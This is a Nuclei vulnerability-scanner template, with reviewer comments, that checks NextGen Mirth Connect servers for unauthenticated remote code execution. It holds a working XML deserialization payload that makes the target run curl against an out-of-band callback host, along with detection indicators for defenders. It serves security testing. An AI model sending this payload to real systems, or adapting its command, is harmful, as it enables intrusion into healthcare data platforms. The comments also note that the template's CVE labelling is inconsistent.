nuclei-templates/http/cves/2023/CVE-2023-37679.yaml


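# Nuclei template: active check for unauthenticated remote code execution in
# NextGen Mirth Connect. It sends two requests: a version probe, then a
# crafted XML POST whose effect is confirmed by an out-of-band callback.
#
# NOTE(review): `id` and `cve-id` say CVE-2023-37679, but the first reference
# URL is titled for CVE-2023-43208. Confirm which advisory the "<4.4.1" bound
# in the matcher belongs to before relying on this template for triage.
id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
  classification:
    cve-id: CVE-2023-37679
  metadata:
    # Two raw requests are sent per target (see http.raw below).
    max-request: 2
    verified: true
    shodan-query: title:"mirth connect administrator"
  tags: cve,cve2023,nextgen,rce

http:
  - raw:
      # Request 1: read the server version without authentication. The body of
      # this response is what the extractor below stores as `version`.
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI

      # Request 2: XML posted to the user API. The document is an XStream-style
      # object graph (sorted-set -> dynamic-proxy -> java.beans.EventHandler ->
      # java.lang.ProcessBuilder) rather than a user record. On a vulnerable
      # server it starts a `curl` process towards the interactsh host, so this
      # is an active check that changes state on the target, not a passive
      # fingerprint.
      # Defender view: an unauthenticated POST to /api/users whose body names
      # java.lang.ProcessBuilder or java.beans.EventHandler is a strong
      # indicator for request-body inspection and log review. Per the
      # description above, releases before 4.4.1 are affected.
      # The blank line after Content-Type separates headers from the body and
      # must be kept.
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
        <string>foo</string>
        <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
        <command>
        <string>curl</string>
        <string>http://{{interactsh-url}}/</string>
        </command>
        </target>
        <action>start</action>
        </handler>
        </dynamic-proxy>
        </sorted-set>

    # All three expressions must hold (condition: and):
    #   1. the extracted version compares lower than 4.4.1,
    #   2. an out-of-band interaction whose protocol contains "dns" was seen,
    #   3. request 1 returned 200 and request 2 returned 500.
    # The DNS callback is the evidence that the command ran; the version and
    # status checks only narrow the match.
    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    # Stores capture group 1 of the first response body as `version` for the
    # matcher above. `internal: true` keeps it as a template variable instead
    # of reporting it as a finding.
    # NOTE(review): '(.*)' accepts any text, so a non-version body (an error
    # page, for instance) would be handed to compare_versions unchanged;
    # consider a pattern that only accepts a dotted version number.
    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# NOTE(review): the digest below was generated for the template text as
# originally published; presumably any edit, comments included, means the
# template has to be re-signed before signature verification passes again.
# digest: 4a0a004730450221008e36cf08f81d2103e905d890bf31e0fc3f94f15eb231fd889a46d46d9cd7b18202205a5d3b1c4a8a0757dea7ab3b0c276c28dedc720c80d0179827f1ccaabc1fc305:922c64590222798bb761d5b6d8e72950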